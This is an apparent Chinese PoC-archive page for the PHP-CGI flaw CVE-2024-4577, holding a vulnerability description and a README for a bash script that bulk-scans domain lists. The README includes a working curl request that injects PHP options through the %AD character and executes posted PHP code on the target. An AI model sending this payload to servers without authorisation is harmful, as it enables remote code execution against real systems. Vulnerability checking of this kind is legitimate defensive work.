关联漏洞
标题:
PHP 操作系统命令注入漏洞
(CVE-2024-4577)
描述:PHP是一种在服务器端执行的脚本语言。 PHP存在操作系统命令注入漏洞,该漏洞源于在特定条件下,Windows系统使用“Best-Fit”行为替换命令行中的字符,这可能导致PHP CGI模块错误地将这些字符解释为PHP选项,从而泄露脚本的源代码,在服务器上运行任意PHP代码等。以下版本受到影响:8.1至8.1.29之前版本,8.3至8.3.8之前版本,8.2至8.2.20之前版本。
介绍
# CVE-2024-4577 Vulnerability Checker
This script is designed to check for the vulnerability described by CVE-2024-4577, which involves exploiting certain PHP configurations to execute arbitrary code remotely. It sends a POST request to specified endpoints on a list of domains and checks if the response indicates vulnerability.
## Usage
1. Install GNU Parallel:
```bash
sudo apt-get install parallel
```
2. **Clone the Repository:**
Clone this repository to your local machine using Git:
```bash
git clone https://github.com/Yukiioz/CVE-2024-4577.git
```
3. **Navigate to the Repository:**
Change into the cloned directory:
```bash
cd CVE-2024-4577
```
4. **Prepare Domain List:**
Create a text file containing a list of domains to check. Each domain should be on a new line. For example:
```
https://example1.com
https://example2.com
https://example3.com
```
5. **Run the Script:**
Execute the script `CVE-2024-4577.sh`, passing the path to the domain list file as an argument:
```bash
./CVE-2024-4577.sh live-subdomains.txt | tee script.log
```
6. **Review Output:**
The script will display progress information as it checks each domain. If a domain is found to be vulnerable, it will be highlighted in red. The script will also export a list of vulnerable domains to a file named `vulnerable_domains.txt`.
#### Exported File: `vulnerable_domains.txt`
The script exports a list of vulnerable domains to a file named `vulnerable_domains.txt`. This file contains a simple list of vulnerable domains, with each domain on a new line. To further manually confirm, use the curl command to send a POST request to the target endpoint on the domain. Replace https://dev.example.com/test.php with the actual endpoint on the target domain.
```bash
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
-H "User-Agent: curl/8.3.0" \
--data "<?php phpinfo(); ?>"
```
文件快照
[4.0K] /data/pocs/3aa6fe5fcfd13c77da12190366b7c47ddb4565bd
├── [1.1K] CVE-2024-4577.sh
└── [2.0K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。